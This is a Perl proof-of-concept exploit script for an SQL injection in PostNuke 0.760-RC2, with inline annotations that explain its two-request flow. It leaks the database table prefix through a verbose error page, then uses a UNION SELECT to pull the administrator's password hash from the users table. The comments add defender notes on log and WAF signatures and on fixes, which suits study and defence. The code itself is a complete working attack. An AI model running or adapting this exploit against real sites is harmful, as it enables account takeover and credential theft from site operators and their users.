#!/usr/bin/perl
use IO::Socket;
# Maksymilian Arciemowicz
#
# GPG http://cxsecurity.com/gpg/key.pgp
# Critical SQL INJECTION
# POSTNUKE 0.760-RC2=>x
#
#
# thx sp3x,nagash(from T-NAS),ladyBMS
# CXSecurity
# Flat script with no subroutines. Flow as written below:
#   1. A probe GET to index.php?catid='cXIb8O3 (a bare single quote in the
#      catid parameter); the response is scanned for an echoed SQL fragment
#      "ORDER BY ... stories.pn_time" and the text between the two is taken
#      as the database table prefix.
#   2. A second GET with catid=-99999 UNION SELECT ... FROM <prefix>users
#      WHERE pn_uid=<UID>, whose response is scanned for a 32-hex-char token.
# Defender notes: both requests are plain GETs, so the query strings (a bare
# "'" in catid, "UNION SELECT", "pn_pass", "/*") appear verbatim in the web
# server access log and are straightforward WAF/IDS signatures.  The two
# application-side root causes visible from this script are an unescaped
# catid parameter and a verbose SQL error page that echoes the failing query;
# prepared statements and suppressing SQL errors in responses close both.
# Code-quality notes: no `use strict`/`use warnings`; $path, $exploit, $get1,
# $get2, $odp and $odpi are package globals that start undefined and are
# grown with `.=`; the scheme is stripped with a regex but the port is fixed
# at 80, so an https:// or host:port argument is not handled.
if (@ARGV < 3)
{
# Usage text, printed when fewer than three positional arguments are given.
print "[cXIb8O3] EXPLOIT for PostNuke 0.760-RC2=>x\r\n";
print " \r\n";
print "perl pn-0760RC2-cXIb8O3.pl HOST /DIR/ USER_ID\r\n\r\n";
print "HOST - Host where is postnuke example: http://localhost\r\n";
print "DIR - Directory to PN example: /PostNuke-0.760-RC2/html/\r\n";
print "UID - standart Admin=2\r\n\r\n";
print "example cmd: perl pn-0760RC2-cXIb8O3.pl http://localhost /html/ 2\r\n\r\n";
exit();
}
$HOST = $ARGV[0];   # host, optionally prefixed with http:// (removed below)
$DIR = $ARGV[1];    # concatenated directly in front of "index.php?..." so it needs a trailing slash
$UID = $ARGV[2];    # interpolated unquoted and unvalidated into the WHERE clause below
print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
# Only a literal "http://" is removed; anything else (https://, :port) stays in
# $HOST and is passed as-is to PeerAddr, where PeerPort is hard-coded to 80.
$HOST =~ s/(http:\/\/)//;
# $path is never initialised; `.=` on undef yields the right-hand side.
$path .= $DIR;
$path .= "index.php?catid='cXIb8O3";
# The "Error 404" message is misleading: a false return here is a TCP connect
# failure (the reason is in $!), not an HTTP status.
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";
# Hand-rolled HTTP/1.1 request; the status line of the reply is never checked.
print $get1 "GET $path HTTP/1.1\r\n";
print $get1 "Host: $HOST\r\n";
print $get1 "Accept: */*\r\n";
print $get1 "Connection: close\r\n\r\n";
# Read the reply line by line (the while/readline form gets an implicit defined()).
while ($odp = <$get1>)
# Matches a line of the error page that echoes the SQL.  The greedy (.*) takes
# everything between "ORDER BY " and the last "stories.pn_time" on the line;
# the unescaped "." before pn_time matches any character.  Note this block runs
# once for EVERY line that matches, opening a new socket each time.
{ if ($odp =~ /ORDER BY (.*)stories.pn_time/) {
$exploit .= $DIR;
# Fixed 21-entry select list; a UNION only succeeds when this count equals the
# column count of the application's own query, which is why the header pins
# the script to one PostNuke version.
$exploit .= "index.php?catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20";
# $1 is still the prefix captured above: no other regex has run in between.
$exploit .= $1;
$exploit .= "users%20WHERE%20pn_uid=";
$exploit .= $UID;
# "/*" comments out the remainder of the original query.  The trailing space
# is sent raw (not %-encoded) inside the request line.
$exploit .= "/* ";
print "\r\nDB PREFIX IS: ".$1."\r\n\r\n";
# Same misleading die message as for $get1.
$get2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";
print $get2 "GET $exploit HTTP/1.1\r\n";
print $get2 "Host: $HOST\r\n";
print $get2 "Accept: */*\r\n";
print $get2 "Connection: close\r\n\r\n";
while ($odpi = <$get2>)
{
# Looks for 32 lowercase hex characters (the length of an MD5 digest, which
# is presumably how pn_pass is stored -- not verifiable from this script)
# rendered as link text in the result page.
if ($odpi =~ /0">([0-9a-f]{32})<\/a>/ ) {
# printf with a format string built from data: any "%" in $UID or in the
# captured token is treated as a conversion.  print is the correct call here.
printf "Password for a user with id ".$UID." is ".$1."\r\n\r\n";
}}}}